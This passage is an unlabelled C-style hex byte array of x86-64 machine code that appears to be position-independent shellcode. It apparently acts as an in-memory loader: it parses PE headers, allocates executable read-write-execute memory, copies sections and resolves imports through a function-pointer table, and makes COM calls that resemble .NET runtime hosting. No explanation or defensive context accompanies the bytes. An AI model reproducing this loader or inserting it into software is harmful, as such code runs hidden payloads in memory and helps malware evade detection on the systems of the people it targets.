331 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00,
332 0xff, 0xd0, 0x48, 0x89, 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00,
333 0x00, 0xeb, 0x5b, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b,
334 0x98, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00,
335 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2,
336 0x48, 0x83, 0xc2, 0x04, 0x48, 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48,
337 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2,
338 0x08, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x45,
339 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xff,
340 0xd3, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b,
341 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b,
342 0x45, 0xec, 0x39, 0xc2, 0x77, 0x91, 0xeb, 0x69, 0x66, 0xc7, 0x45, 0x30,
343 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
344 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
345 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
346 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
347 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x98, 0x90, 0x00, 0x00, 0x00, 0x48,
348 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00,
349 0x00, 0x48, 0x8d, 0x55, 0xea, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89,
350 0xc1, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8,
351 0x48, 0x89, 0xc1, 0xff, 0xd3, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00,
352 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00,
353 0x00, 0x00, 0x4c, 0x8d, 0x45, 0x30, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b,
354 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x66, 0xc7, 0x45, 0x10, 0x01,
355 0x00, 0x48, 0xc7, 0x45, 0x18, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
356 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48,
357 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00,
358 0x00, 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55,
359 0xc0, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55,
360 0x20, 0x48, 0x89, 0x55, 0xd0, 0x4c, 0x8d, 0x4d, 0xf0, 0x4c, 0x8b, 0x85,
361 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc0, 0xff, 0xd0, 0x89, 0x85,
362 0xac, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00,
363 0x0f, 0x84, 0xf3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00,
364 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x38,
365 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00,
366 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00,
367 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xe9, 0xbd, 0x02, 0x00, 0x00,
368 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x38, 0x00,
369 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
370 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b,
371 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x04, 0x00, 0x00,
372 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00,
373 0x48, 0x83, 0xbd, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00,
374 0x00, 0x00, 0x00, 0xe9, 0x72, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
375 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b,
376 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x06, 0x00, 0x00,
377 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00, 0x00,
378 0x48, 0x83, 0xbd, 0x98, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x1d, 0x02,
379 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40,
380 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
381 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x30, 0x48, 0x8b,
382 0x95, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x48, 0x8b, 0x95,
383 0xa0, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00,
384 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xbc, 0x01, 0x00,
385 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
386 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x04, 0x08, 0x00,
387 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xfa, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
388 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
389 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00,
390 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00,
391 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x83,
392 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xbb, 0x00, 0x00, 0x00,
393 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x97, 0x00, 0x00, 0x00,
394 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00,
395 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2, 0x48, 0x83, 0xc2, 0x04, 0x48,
396 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48, 0x8b, 0x95, 0xb0, 0x00, 0x00,
397 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x89, 0xd1, 0xff,
398 0xd0, 0x48, 0x89, 0x45, 0x78, 0x66, 0xc7, 0x45, 0x70, 0x08, 0x00, 0x48,
399 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00, 0x00,
400 0x00, 0x4c, 0x8d, 0x45, 0x70, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b, 0x8d,
401 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00,
402 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x79, 0x25, 0x48, 0x8b, 0x85,
403 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48,
404 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
405 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
406 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b, 0x85, 0xb0, 0x00,
407 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x39,
408 0xc2, 0x0f, 0x87, 0x51, 0xff, 0xff, 0xff, 0x83, 0xbd, 0xac, 0x00, 0x00,
409 0x00, 0x00, 0x0f, 0x88, 0x95, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8,
410 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, 0x48, 0x8b,
411 0x80, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00,
412 0x48, 0x8b, 0x4a, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55, 0xc0,
413 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55, 0x20,
414 0x48, 0x89, 0x55, 0xd0, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x4c,
415 0x8d, 0x45, 0x50, 0x4c, 0x89, 0x44, 0x24, 0x30, 0x4c, 0x8b, 0x85, 0xb8,
416 0x00, 0x00, 0x00, 0x4c, 0x89, 0x44, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0xc0,
417 0x4c, 0x89, 0x44, 0x24, 0x20, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41,
418 0xb8, 0x18, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00,
419 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x74, 0x1a, 0x48,
420 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00,
421 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff,
422 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8,
423 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x48, 0x89,
424 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b,
425 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x00, 0x00, 0x00,
426 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81,
427 0xc4, 0x48, 0x01, 0x00, 0x00, 0x5b, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
428 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
429 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74,
430 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00,
431 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x30,
432 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40,
433 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40,
434 0x38, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
435 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55,
436 0x18, 0x48, 0x8b, 0x52, 0x38, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
437 0x45, 0x18, 0x48, 0xc7, 0x40, 0x38, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
438 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48,
439 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b,
440 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x28, 0x48, 0x89,
441 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x28, 0x00,
442 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48,
443 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20,
444 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48,
445 0x8b, 0x52, 0x20, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18,
446 0x48, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
447 0x48, 0x8b, 0x40, 0x18, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45,
448 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10,
449 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x89, 0xd1, 0xff,
450 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00,
451 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x85, 0xc0,
452 0x74, 0x44, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
453 0x00, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52,
454 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
455 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55,
456 0x18, 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
457 0x45, 0x18, 0x48, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
458 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48,
459 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b,
460 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x08, 0x48, 0x89,
461 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00,
462 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x85,
463 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b,
464 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x12,
465 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00,
466 0x00, 0x00, 0x00, 0x00, 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
467 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb,
468 0x0a, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45, 0x18, 0x01, 0x48,
469 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x12, 0x48, 0x8b,
470 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00,
471 0x38, 0xc2, 0x74, 0xd9, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x0f,
472 0xb6, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x0f, 0xb6, 0xc0,
473 0x29, 0xc2, 0x89, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0xd0, 0x01,
474 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
475 0x8d, 0x60, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x08, 0x01, 0x00, 0x00,
476 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x10, 0x01, 0x00, 0x00, 0x00,
477 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x31, 0xc0, 0x48, 0x79, 0xc7, 0x45,
478 0xa4, 0x1b, 0x8b, 0x44, 0x24, 0xc7, 0x45, 0xa8, 0x04, 0x8b, 0x4c, 0x24,
479 0xc7, 0x45, 0xac, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x45, 0xb0, 0x0c, 0x52,
480 0x81, 0xc2, 0xc7, 0x45, 0xb4, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xb8,
481 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x45, 0xbc, 0xf4, 0xff, 0xd0, 0xc3, 0xc7,
482 0x45, 0xc0, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x45, 0xc4, 0x01, 0x00, 0x00,
483 0x48, 0xc7, 0x45, 0xc8, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x45, 0xcc, 0x01,
484 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd0, 0x89, 0x9c, 0x24, 0x38, 0xc7, 0x45,
485 0xd4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd8, 0x89, 0xbc, 0x24, 0x20,
486 0xc7, 0x45, 0xdc, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe0, 0x89, 0xb4,
487 0x24, 0x28, 0xc7, 0x45, 0xe4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe8,
488 0x89, 0xe6, 0x48, 0x89, 0xc7, 0x45, 0xec, 0xcf, 0xb8, 0x00, 0x02, 0xc7,
489 0x45, 0xf0, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x45, 0xf4, 0xc1, 0x48, 0x8d,
490 0x14, 0xc7, 0x45, 0xf8, 0x01, 0x4c, 0x8d, 0x04, 0xc7, 0x45, 0xfc, 0x02,
491 0x4d, 0x8d, 0x0c, 0xc7, 0x45, 0x00, 0x00, 0x49, 0x8d, 0x1c, 0xc7, 0x45,
492 0x04, 0x01, 0x48, 0x89, 0x9c, 0xc7, 0x45, 0x08, 0x24, 0x00, 0x01, 0x00,
493 0xc7, 0x45, 0x0c, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x45, 0x10, 0x48, 0x89,
494 0x9c, 0x24, 0xc7, 0x45, 0x14, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x45, 0x18,
495 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x45, 0x1c, 0x89, 0x9c, 0x24, 0x10, 0xc7,
496 0x45, 0x20, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x24, 0x01, 0xc3, 0x48,
497 0x89, 0xc7, 0x45, 0x28, 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x45, 0x2c, 0x00,
498 0x00, 0xff, 0xd7, 0xc7, 0x45, 0x30, 0x48, 0x89, 0xf4, 0x48, 0xc7, 0x45,
499 0x34, 0x8b, 0xb4, 0x24, 0x28, 0xc7, 0x45, 0x38, 0x01, 0x00, 0x00, 0x48,
500 0xc7, 0x45, 0x3c, 0x8b, 0xbc, 0x24, 0x20, 0xc7, 0x45, 0x40, 0x01, 0x00,
501 0x00, 0x48, 0xc7, 0x45, 0x44, 0x8b, 0x9c, 0x24, 0x38, 0xc7, 0x45, 0x48,
502 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x4c, 0x8b, 0xac, 0x24, 0x30, 0xc7,
503 0x45, 0x50, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x54, 0x81, 0xc4, 0x48,
504 0x01, 0xc7, 0x45, 0x58, 0x00, 0x00, 0xc3, 0x00, 0x48, 0x8b, 0x85, 0x60,
505 0x01, 0x00, 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
506 0x75, 0x16, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48,
507 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0xeb, 0x15,
508 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07,
509 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
510 0x18, 0x01, 0x00, 0x00, 0x48, 0x05, 0x18, 0x19, 0x00, 0x00, 0x48, 0x89,
511 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
512 0x48, 0x89, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x00,
513 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x00,
514 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xf0, 0x00, 0x00,
515 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x40,
516 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x00,
517 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85,
518 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x8b,
519 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00,
520 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b,
521 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x50, 0x04, 0x48, 0x8b, 0x85,
522 0xd8, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x04, 0x66, 0x39, 0xc2, 0x0f,
523 0x85, 0xa1, 0x06, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00,
524 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xf0, 0x00, 0x00, 0x00, 0x8b,
525 0x52, 0x50, 0x81, 0xc2, 0x00, 0x10, 0x00, 0x00, 0x89, 0xd2, 0x41, 0xb9,
526 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00,
527 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x08, 0x01, 0x00, 0x00,
528 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x5f, 0x06,
529 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40,
530 0x14, 0x0f, 0xb7, 0xd0, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48,
531 0x01, 0xd0, 0x48, 0x83, 0xc0, 0x18, 0x48, 0x89, 0x85, 0xd0, 0x00, 0x00,
532 0x00, 0xc7, 0x85, 0x24, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9,
533 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x24, 0x01, 0x00, 0x00, 0x48, 0x89,
534 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03,
535 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x01,
536 0xd0, 0x8b, 0x40, 0x10, 0x41, 0x89, 0xc0, 0x8b, 0x95, 0x24, 0x01, 0x00,
537 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48,
538 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00,
539 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x14, 0x89, 0xc2, 0x48, 0x8b, 0x85,
540 0x00, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x8b, 0x95, 0x24, 0x01,
541 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0,
542 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00,
543 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b,
544 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0xca, 0x48,
545 0x89, 0xc1, 0xe8, 0x4d, 0x20, 0x00, 0x00, 0x83, 0x85, 0x24, 0x01, 0x00,
546 0x00, 0x01, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40,
547 0x06, 0x0f, 0xb7, 0xc0, 0x3b, 0x85, 0x24, 0x01, 0x00, 0x00, 0x0f, 0x87,
548 0x4c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b,
549 0x80, 0x90, 0x00, 0x00, 0x00, 0x89, 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b,
550 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00,
551 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0xe9, 0x39,
552 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x40,
553 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01,
554 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60,
555 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x95, 0xc0, 0x00,
556 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00,
557 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89,
558 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
559 0x89, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00,
